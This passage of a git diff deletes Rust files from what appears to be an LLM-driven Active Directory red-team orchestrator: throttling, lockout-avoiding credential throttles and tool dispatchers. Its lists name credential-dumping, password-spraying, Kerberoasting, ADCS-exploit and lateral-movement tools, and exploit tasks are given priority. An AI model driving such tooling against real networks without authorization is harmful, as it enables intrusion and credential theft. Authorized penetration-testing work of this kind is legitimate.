self.conn.clone(); - conn.lpush::<_, _, ()>(&key, &json).await?; - conn.expire::<_, ()>(&key, RESULT_TTL_SECS as i64).await?; - let final_status = if result.success { - "completed" - } else { - "failed" - }; - debug!( - task_id = task_id, - status = final_status, - "Updating task status after send_result" - ); - self.set_task_status(task_id, final_status).await?; - debug!(task_id = task_id, "Task status updated to {}", final_status); - Ok(()) - } -} diff --git a/ares-orchestrator/src/throttling.rs b/ares-orchestrator/src/throttling.rs deleted file mode 100644 index 2471c413..00000000 --- a/ares-orchestrator/src/throttling.rs +++ /dev/null @@ -1,440 +0,0 @@ -//! Rate limiting and concurrency control. -//! -//! Mirrors the Python `ares.core.dispatcher.throttling.ThrottlingMixin`. -//! -//! Three layers of throttling: -//! 1. **Per-role semaphores** — limits how many tasks one role can have in-flight. -//! 2. 
**Global LLM concurrency** — soft cap + 1.5x hard cap before deferring. -//! 3. **Dispatch delay** — minimum interval between consecutive submissions. - -use std::collections::HashMap; -use std::sync::Arc; -use std::time::Instant; - -use tokio::sync::Semaphore; -use tracing::{debug, info, warn}; - -use crate::config::OrchestratorConfig; -use crate::routing::ActiveTaskTracker; - -// --------------------------------------------------------------------------- -// Critical-path classification (matches Python ThrottlingMixin constants) -// --------------------------------------------------------------------------- - -/// Task types that bypass hard-cap throttling (DA-critical path). -const CRITICAL_PATH_TASK_TYPES: &[&str] = &["exploit"]; - -/// High-value exploit subtypes that bypass hard cap. -const CRITICAL_PATH_VULN_TYPES: &[&str] = &[ - "constrained_delegation", - "unconstrained_delegation", - "esc1", - "esc4", - "esc8", - "krbtgt_hash", - "adcs_esc1", - "adcs_esc4", - "adcs_esc8", -]; - -/// Maximum tasks allowed to bypass the hard cap simultaneously. -const MAX_BYPASS_TASKS: usize = 3; - -// --------------------------------------------------------------------------- -// ThrottleDecision -// --------------------------------------------------------------------------- - -/// What the throttler decided about a candidate task. -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum ThrottleDecision { - /// Submit immediately. - Allow, - /// Defer to the deferred queue. - Defer, - /// Wait for `duration` then re-check. - Wait(std::time::Duration), -} - -// --------------------------------------------------------------------------- -// Throttler -// --------------------------------------------------------------------------- - -/// Concurrency controller that mirrors the Python throttling logic. -#[allow(dead_code)] -pub struct Throttler { - config: Arc, - tracker: ActiveTaskTracker, - /// Per-role semaphores (lazily populated). - role_semaphores: tokio::sync::Mutex>>, - /// Timestamp of the last successful dispatch. - last_dispatch: tokio::sync::Mutex, - /// Accumulated rate-limit errors (from worker feedback). - rate_limit_errors: tokio::sync::Mutex, - /// Global backoff deadline (if any). - backoff_until: tokio::sync::Mutex>, -} - -impl Throttler { - pub fn new(config: Arc, tracker: ActiveTaskTracker) -> Self { - Self { - config, - tracker, - role_semaphores: tokio::sync::Mutex::new(HashMap::new()), - last_dispatch: tokio::sync::Mutex::new(Instant::now()), - rate_limit_errors: tokio::sync::Mutex::new(0), - backoff_until: tokio::sync::Mutex::new(None), - } - } - - /// Evaluate whether `task_type` targeting `role` should be allowed now. - pub async fn check( - &self, - task_type: &str, - target_role: &str, - payload: Option<&serde_json::Value>, - ) -> ThrottleDecision { - // Non-LLM tasks (crack, command) always pass. 
- if crate::routing::is_non_llm_task(task_type) { - return ThrottleDecision::Allow; - } - - { - let backoff = self.backoff_until.lock().await; - if let Some(deadline) = *backoff { - if Instant::now() < deadline { - let remaining = deadline - Instant::now(); - return ThrottleDecision::Wait(remaining); - } - } - } - - let llm_count = self.tracker.llm_task_count().await; - let max_tasks = self.config.max_concurrent_tasks; - let hard_cap = self.config.hard_cap(); - - // --- HARD CAP (1.5x) --- - if llm_count >= hard_cap { - if self.is_critical_path(task_type, payload) { - let bypass_count = llm_count.saturating_sub(hard_cap); - if bypass_count >= MAX_BYPASS_TASKS { - warn!( - llm_count, - hard_cap, - bypass_count, - task_type, - "Hard cap: too many bypass tasks, deferring" - ); - return ThrottleDecision::Defer; - } - info!( - llm_count, - hard_cap, - bypass = bypass_count + 1, - task_type, - "Hard cap: allowing critical-path task" - ); - return ThrottleDecision::Allow; - } - - debug!(llm_count, hard_cap, task_type, "Hard cap: deferring task"); - return ThrottleDecision::Defer; - } - - // --- SOFT CAP --- - if llm_count >= max_tasks { - let role_count = self.tracker.count_for_role(target_role).await; - let min_per_role = 1_usize; // matches get_min_slots_per_role default - if role_count < min_per_role { - info!( - llm_count, - max_tasks, - role = target_role, - role_count, - "Soft cap: allowing — role below minimum" - ); - return ThrottleDecision::Allow; - } - debug!(llm_count, max_tasks, task_type, "Soft cap: deferring task"); - return ThrottleDecision::Defer; - } - - // --- Dispatch delay --- - { - let last = self.last_dispatch.lock().await; - let elapsed = last.elapsed(); - if elapsed < self.config.dispatch_delay { - let wait = self.config.dispatch_delay - elapsed; - return ThrottleDecision::Wait(wait); - } - } - - ThrottleDecision::Allow - } - - /// Record that a dispatch happened (updates the last-dispatch timestamp). - pub async fn record_dispatch(&self) { - let mut last = self.last_dispatch.lock().await; - *last = Instant::now(); - } - - /// Record a rate-limit error from a worker. If enough accumulate, trigger - /// a global backoff. - pub async fn record_rate_limit_error(&self) { - let mut errors = self.rate_limit_errors.lock().await; - *errors += 1; - let threshold = 3_u32; // matches Python get_rate_limit_threshold default - if *errors >= threshold { - let backoff_secs = 30_u64; // matches Python get_rate_limit_backoff default - let mut bo = self.backoff_until.lock().await; - *bo = Some(Instant::now() + std::time::Duration::from_secs(backoff_secs)); - warn!( - errors = *errors, - backoff_secs, "Rate limit threshold reached — applying global backoff" - ); - *errors = 0; - } - } - - /// Clear one rate-limit error (call on successful task completion). - pub async fn clear_rate_limit_error(&self) { - let mut errors = self.rate_limit_errors.lock().await; - *errors = errors.saturating_sub(1); - } - - /// Acquire a per-role semaphore permit. Returns a guard that releases on drop. 
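The cap arithmetic behind the decisions above, as a sketch: the soft cap defers new LLM tasks, while the hard cap (1.5× the soft cap, per the module doc) still admits up to MAX_BYPASS_TASKS critical-path tasks. The role-minimum exception on the soft-cap path is omitted here:

#[derive(Debug, PartialEq)]
enum Decision { Allow, Defer }

fn decide(in_flight: usize, soft_cap: usize, critical: bool, bypass_in_use: usize) -> Decision {
    let hard_cap = soft_cap * 3 / 2; // 1.5x, assuming integer config values
    if in_flight >= hard_cap {
        if critical && bypass_in_use < 3 {
            return Decision::Allow; // bounded critical-path bypass
        }
        return Decision::Defer;
    }
    if in_flight >= soft_cap { Decision::Defer } else { Decision::Allow }
}

fn main() {
    assert_eq!(decide(3, 2, false, 0), Decision::Defer); // over hard cap
    assert_eq!(decide(3, 2, true, 0), Decision::Allow);  // critical bypass
    assert_eq!(decide(1, 2, false, 0), Decision::Allow);
}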
- #[allow(dead_code)] - pub async fn acquire_role_permit( - &self, - role: &str, - ) -> Option { - let sem = { - let mut sems = self.role_semaphores.lock().await; - sems.entry(role.to_string()) - .or_insert_with(|| Arc::new(Semaphore::new(self.config.max_tasks_per_role))) - .clone() - }; - sem.try_acquire_owned().ok() - } - - // --- internal --- - - fn is_critical_path(&self, task_type: &str, payload: Option<&serde_json::Value>) -> bool { - // Check exploit + vuln_type - if CRITICAL_PATH_TASK_TYPES.contains(&task_type) { - if let Some(p) = payload { - let vt = p - .get("vuln_type") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_lowercase(); - if CRITICAL_PATH_VULN_TYPES.contains(&vt.as_str()) { - return true; - } - } - } - - // Check delegation enumeration - if task_type == "privesc_enumeration" { - if let Some(techniques) = payload - .and_then(|p| p.get("techniques")) - .and_then(|v| v.as_array()) - { - if techniques.iter().any(|t| { - t.as_str() - .map(|s| s.to_lowercase().contains("delegation")) - .unwrap_or(false) - }) { - return true; - } - } - } - - // Check ESC8 coercion - if task_type == "coercion" { - if let Some(techniques) = payload - .and_then(|p| p.get("techniques")) - .and_then(|v| v.as_array()) - { - let esc8_techniques = ["ntlmrelayx_to_adcs", "petitpotam"]; - if techniques.iter().any(|t| { - t.as_str() - .map(|s| esc8_techniques.contains(&s.to_lowercase().as_str())) - .unwrap_or(false) - }) { - return true; - } - } - } - - false - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::routing::{ActiveTask, ActiveTaskTracker}; - use serde_json::json; - - fn make_throttler(max_tasks: usize) -> (Throttler, ActiveTaskTracker) { - let config = Arc::new(crate::config::OrchestratorConfig { - redis_url: "redis://localhost".into(), - operation_id: "test-op".into(), - max_concurrent_tasks: max_tasks, - heartbeat_interval: std::time::Duration::from_secs(30), - heartbeat_timeout: std::time::Duration::from_secs(120), - result_poll_interval: std::time::Duration::from_millis(500), - lock_ttl: std::time::Duration::from_secs(300), - deferred_poll_interval: std::time::Duration::from_secs(10), - max_tasks_per_role: 3, - dispatch_delay: std::time::Duration::from_millis(0), - stale_task_timeout: std::time::Duration::from_secs(300), - deferred_task_max_age: std::time::Duration::from_secs(300), - max_deferred_per_type: 5, - max_deferred_total: 20, - target_domain: String::new(), - target_ips: Vec::new(), - initial_credential: None, - }); - let tracker = ActiveTaskTracker::new(); - (Throttler::new(config, tracker.clone()), tracker) - } - - #[tokio::test] - async fn non_llm_always_allowed() { - let (t, _) = make_throttler(1); - assert_eq!( - t.check("crack", "cracker", None).await, - ThrottleDecision::Allow - ); - assert_eq!( - t.check("command", "lateral", None).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn under_soft_cap_allows() { - let (t, _) = make_throttler(8); - assert_eq!( - t.check("recon", "recon", None).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn hard_cap_defers_non_critical() { - let (t, tracker) = make_throttler(2); // soft=2, hard=3 - for i in 0..3 { - tracker - .add(ActiveTask { - task_id: format!("t{i}"), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: Instant::now(), - }) - .await; - } - assert_eq!( - t.check("recon", "recon", None).await, - ThrottleDecision::Defer - ); - } - - #[tokio::test] - async fn critical_path_bypasses_hard_cap() { - let (t, tracker) = make_throttler(2); - for i in 0..3 { 
- tracker - .add(ActiveTask { - task_id: format!("t{i}"), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: Instant::now(), - }) - .await; - } - let payload = json!({"vuln_type": "constrained_delegation"}); - assert_eq!( - t.check("exploit", "privesc", Some(&payload)).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn critical_path_delegation_enum() { - let (t, tracker) = make_throttler(2); - for i in 0..3 { - tracker - .add(ActiveTask { - task_id: format!("t{i}"), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: Instant::now(), - }) - .await; - } - let payload = json!({"techniques": ["find_delegation"]}); - assert_eq!( - t.check("privesc_enumeration", "privesc", Some(&payload)) - .await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn critical_path_esc8_coercion() { - let (t, tracker) = make_throttler(2); - for i in 0..3 { - tracker - .add(ActiveTask { - task_id: format!("t{i}"), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: Instant::now(), - }) - .await; - } - let payload = json!({"techniques": ["petitpotam"]}); - assert_eq!( - t.check("coercion", "coercion", Some(&payload)).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn rate_limit_triggers_backoff() { - let (t, _) = make_throttler(8); - t.record_rate_limit_error().await; - t.record_rate_limit_error().await; - t.record_rate_limit_error().await; // threshold=3 - assert!(matches!( - t.check("recon", "recon", None).await, - ThrottleDecision::Wait(_) - )); - } - - #[tokio::test] - async fn clear_error_prevents_backoff() { - let (t, _) = make_throttler(8); - t.record_rate_limit_error().await; - t.record_rate_limit_error().await; - t.clear_rate_limit_error().await; // back to 1 - t.record_rate_limit_error().await; // now 2 - assert_eq!( - t.check("recon", "recon", None).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn role_semaphore_limits() { - let (t, _) = make_throttler(8); - let _p1 = t.acquire_role_permit("recon").await; - let _p2 = t.acquire_role_permit("recon").await; - let _p3 = t.acquire_role_permit("recon").await; - assert!(_p1.is_some() && _p2.is_some() && _p3.is_some()); - assert!(t.acquire_role_permit("recon").await.is_none()); - assert!(t.acquire_role_permit("lateral").await.is_some()); - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/auth_throttle.rs b/ares-orchestrator/src/tool_dispatcher/auth_throttle.rs deleted file mode 100644 index c6ae3023..00000000 --- a/ares-orchestrator/src/tool_dispatcher/auth_throttle.rs +++ /dev/null @@ -1,88 +0,0 @@ -//! Per-credential auth throttle to prevent AD account lockout. - -use std::sync::Arc; -use std::time::{Duration, Instant}; - -use tokio::sync::Mutex; -use tracing::debug; - -/// Per-credential auth attempt tracker. -/// -/// Tracks timestamps of auth-bearing tool dispatches keyed by `user@domain`. -/// Before dispatching, callers must call `acquire()` which sleeps if the -/// credential has been used too many times within the observation window. -/// -/// Default policy: max 3 auth attempts per credential per 60-second window. -/// This stays well under the typical AD lockout threshold (5 in 5 min). -#[derive(Clone)] -pub struct AuthThrottle { - pub(super) inner: Arc>, -} - -pub(super) struct AuthThrottleInner { - /// `credential_key` → Vec of timestamps - pub(super) attempts: std::collections::HashMap>, - /// Max auth attempts per credential within the observation window. 
- pub(super) max_attempts: usize, - /// Observation window for rate limiting. - pub(super) window: Duration, -} - -impl AuthThrottle { - pub fn new(max_attempts: usize, window: Duration) -> Self { - Self { - inner: Arc::new(Mutex::new(AuthThrottleInner { - attempts: std::collections::HashMap::new(), - max_attempts, - window, - })), - } - } - - /// Acquire permission to dispatch an auth-bearing tool call. - /// Sleeps if the credential has hit the rate limit within the window. - pub async fn acquire(&self, credential_key: &str) { - loop { - let sleep_dur = { - let mut inner = self.inner.lock().await; - let now = Instant::now(); - let max_attempts = inner.max_attempts; - let window = inner.window; - - let timestamps = inner - .attempts - .entry(credential_key.to_string()) - .or_default(); - - // Prune expired entries - timestamps.retain(|t| now.duration_since(*t) < window); - - if timestamps.len() < max_attempts { - // Under the limit — record this attempt and proceed - timestamps.push(now); - return; - } - - // Over the limit — calculate how long to wait until the oldest - // attempt falls outside the window - let oldest = timestamps[0]; - let elapsed = now.duration_since(oldest); - if elapsed >= window { - // Edge case: already expired, prune and retry - timestamps.remove(0); - timestamps.push(now); - return; - } - - window - elapsed + Duration::from_millis(100) - }; - - debug!( - credential = credential_key, - wait_secs = sleep_dur.as_secs_f32(), - "Auth throttle: delaying tool dispatch to avoid account lockout" - ); - tokio::time::sleep(sleep_dur).await; - } - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/local.rs b/ares-orchestrator/src/tool_dispatcher/local.rs deleted file mode 100644 index 496e1aa7..00000000 --- a/ares-orchestrator/src/tool_dispatcher/local.rs +++ /dev/null @@ -1,91 +0,0 @@ -//! In-process tool dispatcher (no Redis). - -use anyhow::Result; -use tracing::debug; - -use ares_llm::{ToolCall, ToolExecResult}; - -use crate::task_queue::TaskQueue; - -use super::{extract_credential_key, push_realtime_discoveries, AuthThrottle}; - -/// Dispatches tool calls directly via `ares_tools::dispatch` without Redis. -/// -/// Useful for testing, single-binary deployments, or when workers are -/// colocated in the same process as the orchestrator. 
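Since the in-process dispatcher and the auth throttle are constructed together, a minimal wiring sketch may help; it assumes the crate's `TaskQueue` type, uses an illustrative operation ID, and mirrors the 3-attempts-per-60-second default documented above:

```rust
use std::time::Duration;

// Hypothetical wiring for a single-binary deployment: tools execute
// in-process, but auth-bearing calls still pass through the shared
// per-credential throttle before dispatch.
fn build_local_dispatcher(queue: TaskQueue) -> LocalToolDispatcher {
    // Documented default policy: max 3 auth attempts per credential per
    // 60-second window (well under typical AD lockout thresholds).
    let throttle = AuthThrottle::new(3, Duration::from_secs(60));
    LocalToolDispatcher::new(queue, "op-20260415-120000".to_string(), throttle)
}
```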
-pub struct LocalToolDispatcher { - pub(super) queue: TaskQueue, - pub(super) operation_id: String, - pub(super) auth_throttle: AuthThrottle, -} - -impl LocalToolDispatcher { - pub fn new(queue: TaskQueue, operation_id: String, auth_throttle: AuthThrottle) -> Self { - Self { - queue, - operation_id, - auth_throttle, - } - } -} - -#[async_trait::async_trait] -impl ares_llm::ToolDispatcher for LocalToolDispatcher { - async fn dispatch_tool( - &self, - _role: &str, - _task_id: &str, - call: &ToolCall, - ) -> Result { - // Rate-limit auth-bearing tools to prevent AD account lockout - if let Some(cred_key) = extract_credential_key(call) { - self.auth_throttle.acquire(&cred_key).await; - } - - debug!(tool = %call.name, "Executing tool locally"); - - match ares_tools::dispatch(&call.name, &call.arguments).await { - Ok(output) => { - let raw = output.combined_raw(); - let combined = output.combined(); - let error = if output.success { - None - } else { - Some(format!("tool exited with code {:?}", output.exit_code)) - }; - - // Parse structured discoveries from raw (unfiltered) output - let discoveries = - ares_tools::parsers::parse_tool_output(&call.name, &raw, &call.arguments); - let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { - None - } else { - Some(discoveries) - }; - - // Push discoveries to real-time list immediately (like RedisToolDispatcher) - if let Some(ref disc) = discoveries { - push_realtime_discoveries( - &self.queue, - &self.operation_id, - disc, - &call.name, - &call.arguments, - ) - .await; - } - - Ok(ToolExecResult { - output: combined, - error, - discoveries, - }) - } - Err(e) => Ok(ToolExecResult { - output: String::new(), - error: Some(e.to_string()), - discoveries: None, - }), - } - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/mod.rs b/ares-orchestrator/src/tool_dispatcher/mod.rs deleted file mode 100644 index ad8d4327..00000000 --- a/ares-orchestrator/src/tool_dispatcher/mod.rs +++ /dev/null @@ -1,228 +0,0 @@ -//! Redis-backed tool dispatcher for the LLM agent loop. -//! -//! Implements `ares_llm::ToolDispatcher` by pushing individual tool calls -//! to a Redis queue (`ares:tool_exec:{role}`) and waiting for results -//! on a per-call mailbox (`ares:tool_results:{call_id}`). -//! -//! Rust workers run a tool executor that BRPOPs from `tool_exec`, -//! invokes the tool via `ares_tools::dispatch`, and LPUSHes the result. -//! -//! Also provides [`LocalToolDispatcher`] for in-process execution without -//! going through Redis, useful for testing or single-binary deployments. - -use redis::AsyncCommands; -use serde::{Deserialize, Serialize}; -use tracing::debug; - -use crate::state::DISCOVERY_KEY_PREFIX; -use crate::task_queue::TaskQueue; - -mod auth_throttle; -mod local; -mod redis_dispatcher; -#[cfg(test)] -mod tests; - -pub use auth_throttle::AuthThrottle; -pub use local::LocalToolDispatcher; -pub use redis_dispatcher::RedisToolDispatcher; - -// --------------------------------------------------------------------------- -// Wire format -// --------------------------------------------------------------------------- - -/// Message pushed to the tool execution queue. -#[derive(Debug, Serialize, Deserialize)] -pub struct ToolExecRequest { - pub call_id: String, - pub task_id: String, - pub tool_name: String, - pub arguments: serde_json::Value, - /// W3C traceparent header for cross-service span linking. 
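- /// (A traceparent has the W3C form `00-{trace-id}-{parent-id}-{trace-flags}`,
- /// e.g. `00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01`.)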
- #[serde(skip_serializing_if = "Option::is_none", default)] - pub traceparent: Option, - /// Operation ID for span correlation with dashboards. - #[serde(skip_serializing_if = "Option::is_none", default)] - pub operation_id: Option, -} - -/// Message returned by the worker on the result mailbox. -#[derive(Debug, Serialize, Deserialize)] -pub struct ToolExecResponse { - pub call_id: String, - pub output: String, - pub error: Option, - /// Structured discoveries parsed by the worker from tool output. - #[serde(default)] - pub discoveries: Option, -} - -// --------------------------------------------------------------------------- -// Constants -// --------------------------------------------------------------------------- - -/// Prefix for tool execution request queues. -pub(super) const TOOL_EXEC_PREFIX: &str = "ares:tool_exec"; - -/// Prefix for per-call result mailboxes. -pub(super) const TOOL_RESULT_PREFIX: &str = "ares:tool_results"; - -/// TTL for result keys (1 hour). -pub(super) const RESULT_TTL_SECS: u64 = 3600; - -/// Default timeout waiting for a tool result (25 minutes). -/// Must exceed queue wait time + longest tool runtime (hashcat can queue -/// behind another hashcat, so 2x runtime + buffer). -pub(super) const DEFAULT_TOOL_TIMEOUT_SECS: u64 = 1500; - -// --------------------------------------------------------------------------- -// Dispatcher helpers -// --------------------------------------------------------------------------- - -/// Tools that require netexec/ldapsearch and must be routed to the recon -/// worker queue regardless of the calling agent's role. -const RECON_ROUTED_TOOLS: &[&str] = &[ - "ldap_search_descriptions", - "password_spray", - "username_as_password", - "gpp_password_finder", - "sysvol_script_search", - "password_policy", - "laps_dump", - "smbclient_spider", - "check_credman_entries", - "check_autologon_registry", - "domain_admin_checker", - "gmsa_dump_passwords", -]; - -/// Tools that authenticate against AD targets. Tool calls with these names -/// are subject to per-credential rate limiting to avoid account lockout. -const AUTH_BEARING_TOOLS: &[&str] = &[ - // netexec tools (each invocation is a separate SMB/LDAP auth) - "ldap_search_descriptions", - "password_spray", - "username_as_password", - "gpp_password_finder", - "sysvol_script_search", - "password_policy", - "laps_dump", - "smbclient_spider", - "check_credman_entries", - "check_autologon_registry", - "domain_admin_checker", - "gmsa_dump_passwords", - // impacket tools - "secretsdump", - "secretsdump_kerberos", - "kerberoast", - "asrep_roast", - "lsassy", - "ntds_dit_extract", - // lateral tools (auth per target) - "smbexec", - "psexec", - "wmiexec", - "dcomexec", - "atexec", - "smbclient_kerberos_shares", -]; - -/// Extract a credential key from tool call arguments for rate limiting. -/// Returns `Some("user@domain")` if the tool authenticates with credentials. -pub(super) fn extract_credential_key(call: &ares_llm::ToolCall) -> Option { - if !AUTH_BEARING_TOOLS.contains(&call.name.as_str()) { - return None; - } - let username = call.arguments.get("username").and_then(|v| v.as_str())?; - let domain = call - .arguments - .get("domain") - .and_then(|v| v.as_str()) - .filter(|s| !s.is_empty()) - .unwrap_or("unknown"); - Some(format!( - "{}@{}", - username.to_lowercase(), - domain.to_lowercase() - )) -} - -/// Resolve the actual worker queue for a tool call. -/// -/// Most tools go to the calling agent's role queue. 
Netexec-dependent tools -/// are cross-routed to the `recon` queue where the binary exists. -pub(super) fn resolve_queue_role<'a>(role: &'a str, tool_name: &str) -> &'a str { - if role != "recon" && RECON_ROUTED_TOOLS.contains(&tool_name) { - "recon" - } else { - role - } -} - -/// Push structured discoveries from a tool result to the real-time -/// discovery list so the discovery poller publishes them to state. -/// -/// `tool_args` carries the tool call's input arguments — used to extract -/// the authenticating credential (username/domain) for lineage tracking. -pub(super) async fn push_realtime_discoveries( - queue: &TaskQueue, - operation_id: &str, - discoveries: &serde_json::Value, - tool_name: &str, - tool_args: &serde_json::Value, -) { - let discovery_key = format!("{DISCOVERY_KEY_PREFIX}:{operation_id}"); - let mut conn = queue.connection(); - - // Extract input credential context for lineage tracking - let input_username = tool_args - .get("username") - .or_else(|| tool_args.get("user")) - .and_then(|v| v.as_str()) - .unwrap_or(""); - let input_domain = tool_args - .get("domain") - .and_then(|v| v.as_str()) - .unwrap_or(""); - - // Push each discovery type as individual entries - let type_map: &[(&str, &str)] = &[ - ("hosts", "host"), - ("credentials", "credential"), - ("hashes", "hash"), - ("vulnerabilities", "vulnerability"), - ("shares", "share"), - ("discovered_users", "user"), - ]; - - let mut pushed = 0usize; - for &(key, disc_type) in type_map { - if let Some(items) = discoveries.get(key).and_then(|v| v.as_array()) { - for item in items { - let mut entry = serde_json::json!({ - "type": disc_type, - "data": item, - "source_tool": tool_name, - }); - // Attach input credential context for lineage resolution - if !input_username.is_empty() { - entry["input_username"] = serde_json::Value::String(input_username.to_string()); - entry["input_domain"] = serde_json::Value::String(input_domain.to_string()); - } - if let Ok(json) = serde_json::to_string(&entry) { - let _: anyhow::Result<(), _> = conn.lpush(&discovery_key, &json).await; - pushed += 1; - } - } - } - } - - if pushed > 0 { - debug!( - count = pushed, - tool = tool_name, - "Pushed real-time discoveries" - ); - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/redis_dispatcher.rs b/ares-orchestrator/src/tool_dispatcher/redis_dispatcher.rs deleted file mode 100644 index 6a6400b8..00000000 --- a/ares-orchestrator/src/tool_dispatcher/redis_dispatcher.rs +++ /dev/null @@ -1,165 +0,0 @@ -//! Redis-backed tool dispatcher. - -use anyhow::{Context, Result}; -use redis::AsyncCommands; -use tracing::{debug, warn, Instrument}; - -use ares_core::telemetry::propagation::inject_traceparent; -use ares_core::telemetry::spans::{producer_span, Team}; -use ares_llm::{ToolCall, ToolExecResult}; - -use crate::task_queue::TaskQueue; - -use super::{ - extract_credential_key, push_realtime_discoveries, AuthThrottle, ToolExecRequest, - ToolExecResponse, RESULT_TTL_SECS, TOOL_EXEC_PREFIX, TOOL_RESULT_PREFIX, -}; - -/// Dispatches tool calls to workers via Redis queues. -/// -/// When tool results contain structured discoveries (hosts, credentials, etc.), -/// they are pushed to the `ares:discoveries:{op_id}` list for real-time -/// processing by the discovery poller — ensuring discoveries reach state -/// immediately rather than waiting for the task result consumer. 
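The queue protocol is easiest to see as concrete keys and payloads. A sketch using the constants above — the call ID, task ID, and arguments are illustrative, borrowed from the unit tests further down:

```rust
// Illustrative round-trip for one tool call, following the documented key
// scheme: requests go to ares:tool_exec:{role}, results come back on the
// per-call mailbox ares:tool_results:{call_id}.
fn show_wire_format() {
    let role = "recon";
    let call_id = "nmap_scan_9f2c"; // real IDs are "{tool_name}_{uuid}"
    let queue_key = format!("ares:tool_exec:{role}");
    let result_key = format!("ares:tool_results:{call_id}");

    let request = serde_json::json!({
        "call_id": call_id,
        "task_id": "recon_def456",
        "tool_name": "nmap_scan",
        "arguments": { "target": "192.168.58.0/24" },
    });

    // Orchestrator: LPUSH the request, then BRPOP the mailbox with a timeout.
    // Worker: BRPOP the queue, dispatch the tool, LPUSH the response.
    println!("LPUSH {queue_key} {request}");
    println!("BRPOP {result_key}");
}
```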
-pub struct RedisToolDispatcher { - pub(super) queue: TaskQueue, - pub(super) tool_timeout: std::time::Duration, - pub(super) operation_id: String, - pub(super) auth_throttle: AuthThrottle, -} - -impl RedisToolDispatcher { - pub fn new(queue: TaskQueue, operation_id: String, auth_throttle: AuthThrottle) -> Self { - Self { - queue, - tool_timeout: std::time::Duration::from_secs(super::DEFAULT_TOOL_TIMEOUT_SECS), - operation_id, - auth_throttle, - } - } -} - -#[async_trait::async_trait] -impl ares_llm::ToolDispatcher for RedisToolDispatcher { - async fn dispatch_tool( - &self, - role: &str, - task_id: &str, - call: &ToolCall, - ) -> Result { - let effective_role = super::resolve_queue_role(role, &call.name); - let span = producer_span( - &format!("dispatch.{}", call.name), - role, - Team::Red, - &format!("ares-worker-{effective_role}"), - ); - - async { - // Rate-limit auth-bearing tools to prevent AD account lockout - if let Some(cred_key) = extract_credential_key(call) { - self.auth_throttle.acquire(&cred_key).await; - } - - let call_id = format!("{}_{}", call.name, uuid::Uuid::new_v4().simple()); - - // Inject trace context for cross-service span linking - let traceparent = inject_traceparent(&tracing::Span::current()); - - let request = ToolExecRequest { - call_id: call_id.clone(), - task_id: task_id.to_string(), - tool_name: call.name.clone(), - arguments: call.arguments.clone(), - traceparent, - operation_id: Some(self.operation_id.clone()), - }; - - let queue_key = format!("{TOOL_EXEC_PREFIX}:{effective_role}"); - let result_key = format!("{TOOL_RESULT_PREFIX}:{call_id}"); - let payload = - serde_json::to_string(&request).context("Failed to serialize tool exec request")?; - - debug!( - tool = %call.name, - call_id = %call_id, - queue = %queue_key, - effective_role = %effective_role, - "Dispatching tool call to worker" - ); - - // Push request to worker queue - let mut conn = self.queue.connection(); - conn.lpush::<_, _, ()>(&queue_key, &payload) - .await - .context("Failed to push tool exec request to Redis")?; - - // Wait for result with timeout - let timeout_secs = self.tool_timeout.as_secs().max(1) as f64; - let brpop_result: Option<(String, String)> = redis::cmd("BRPOP") - .arg(&result_key) - .arg(timeout_secs) - .query_async(&mut conn) - .await - .context("BRPOP failed for tool result")?; - - match brpop_result { - Some((_key, value)) => { - let response: ToolExecResponse = serde_json::from_str(&value) - .context("Failed to deserialize tool exec response")?; - - debug!( - tool = %call.name, - call_id = %call_id, - has_error = response.error.is_some(), - "Tool result received" - ); - - // Push discoveries to the real-time discovery list so - // the discovery poller publishes them to state immediately, - // independent of the task result consumer. 
- if let Some(ref disc) = response.discoveries { - push_realtime_discoveries( - &self.queue, - &self.operation_id, - disc, - &call.name, - &call.arguments, - ) - .await; - } - - Ok(ToolExecResult { - output: response.output, - error: response.error, - discoveries: response.discoveries, - }) - } - None => { - warn!( - tool = %call.name, - call_id = %call_id, - timeout_secs = timeout_secs, - "Tool execution timed out" - ); - - // Clean up any late result - let _: Result<(), _> = conn - .expire::<_, ()>(&result_key, RESULT_TTL_SECS as i64) - .await; - - Ok(ToolExecResult { - output: String::new(), - error: Some(format!( - "Tool '{}' timed out after {timeout_secs}s", - call.name - )), - discoveries: None, - }) - } - } - } - .instrument(span) - .await - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/tests.rs b/ares-orchestrator/src/tool_dispatcher/tests.rs deleted file mode 100644 index 00d9940a..00000000 --- a/ares-orchestrator/src/tool_dispatcher/tests.rs +++ /dev/null @@ -1,98 +0,0 @@ -use super::*; - -#[test] -fn test_tool_exec_request_serialization() { - let req = ToolExecRequest { - call_id: "nmap_scan_abc123".into(), - task_id: "recon_def456".into(), - tool_name: "nmap_scan".into(), - arguments: serde_json::json!({"target": "192.168.58.0/24"}), - traceparent: None, - operation_id: Some("op-20260415-120000".into()), - }; - - let json = serde_json::to_string(&req).unwrap(); - let parsed: ToolExecRequest = serde_json::from_str(&json).unwrap(); - assert_eq!(parsed.call_id, "nmap_scan_abc123"); - assert_eq!(parsed.tool_name, "nmap_scan"); -} - -#[test] -fn test_tool_exec_response_deserialization() { - let json = r#"{"call_id":"nmap_scan_abc","output":"Found 5 hosts","error":null}"#; - let resp: ToolExecResponse = serde_json::from_str(json).unwrap(); - assert_eq!(resp.output, "Found 5 hosts"); - assert!(resp.error.is_none()); -} - -#[test] -fn test_tool_exec_response_with_error() { - let json = r#"{"call_id":"x","output":"","error":"Connection refused"}"#; - let resp: ToolExecResponse = serde_json::from_str(json).unwrap(); - assert_eq!(resp.error.as_deref(), Some("Connection refused")); -} - -#[test] -fn test_cross_role_routing_netexec_tools() { - // Netexec tools called from 